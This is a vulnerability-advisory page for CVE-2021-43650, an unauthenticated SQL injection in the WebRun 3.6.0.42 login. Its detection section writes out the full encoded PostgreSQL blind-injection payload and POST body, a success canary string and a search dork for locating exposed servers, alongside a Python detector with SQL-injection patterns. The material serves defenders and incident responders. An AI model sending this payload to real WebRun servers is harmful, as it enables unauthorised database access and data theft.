CVE-2021-43650
published 2022-03-22

CVE-2021-43650: WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.

Priority: P264 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 6.16% (92.6th percentile)

Affected

1 ranges
Vendor     Product   Version range   Fixed in
softwell   webrun

Detection & IOCs (extracted from sources)

other: P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd
command: action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
other: qvvxq1qbzbq
  • Monitor POST requests to the login endpoint for SQL injection patterns in the P_0 parameter, specifically CAST/CHR-based blind SQLi payloads targeting a PostgreSQL backend.
  • Alert on POST body containing 'action=executeRule' combined with 'ruleName=GES_FLX_Gerar+Token+Dashboard' and SQL metacharacters in P_0, as this is the specific rule endpoint abused during exploitation.
  • Detect the canary string 'qvvxq1qbzbq' in HTTP responses, which confirms successful exploitation of the PostgreSQL CAST-based error injection.
  • Use the Google Dork 'intitle:"Webrun 3.6.0.42"' to identify exposed vulnerable instances for asset inventory and attack surface reduction.
  • The vulnerable parameter P_0 is submitted via POST body (not URL query string); network inspection rules must inspect POST body content to detect this attack.
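
The checks in the notes above, sketched as POST-body inspection logic. This is an added example, not code from the advisory or the vendor; it assumes the body is application/x-www-form-urlencoded, and the pattern set, function names and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

RULE_NAME = "GES_FLX_Gerar Token Dashboard"  # rule endpoint named on the page
CANARY = "qvvxq1qbzbq"                       # response marker listed on the page

# Heuristic patterns for the decoded P_0 value (assumed, tune per deployment).
SQLI_PATTERNS = {
    "quote_breakout": re.compile(r"'\s*\)"),
    "cast_call": re.compile(r"\bCAST\s*\(", re.I),
    "chr_call": re.compile(r"\bCHR\s*\(", re.I),
    "concat_op": re.compile(r"\|\|"),
    "pg_cast": re.compile(r"::\s*\w+"),
}

# Constructed sample bodies (not captured traffic).
BENIGN = ("action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard"
          "&sys=GES&formID=8265&parentRID=-1&P_0=alice&P_1=pwd")
SUSPICIOUS = ("action=executeRule&ruleName=GES_FLX_Gerar+Token+Dashboard"
              "&P_0=x')+AND+1%3dCAST((CHR(113)||CHR(113))%3a%3atext+AS+NUMERIC)"
              "+AND+('a'%3d'a&P_1=pwd")

def inspect_login_post(body: str) -> dict:
    """Decode a form-encoded POST body and classify the P_0 (username) field."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes '+' and %xx
    p0 = " ".join(fields.get("P_0", []))
    hits = sorted(n for n, rx in SQLI_PATTERNS.items() if rx.search(p0))
    rule_match = (fields.get("action") == ["executeRule"]
                  and fields.get("ruleName") == [RULE_NAME])
    if hits and rule_match:
        severity = "high"      # SQL syntax in P_0 on the rule named in the notes
    elif hits:
        severity = "medium"    # SQL syntax in P_0 on some other action
    else:
        severity = "none"
    return {"severity": severity, "hits": hits, "rule_match": rule_match}

def response_has_canary(response_body: str) -> bool:
    """True when the response echoes the canary string from the page."""
    return CANARY in response_body

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_login_post(body))
```

Matching runs on the decoded field value, so URL-encoded operators such as %3d and %3a%3a are seen as = and :: before the patterns are applied.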

CVSS provenance

nvd   v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd   v2.0   7.5   HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P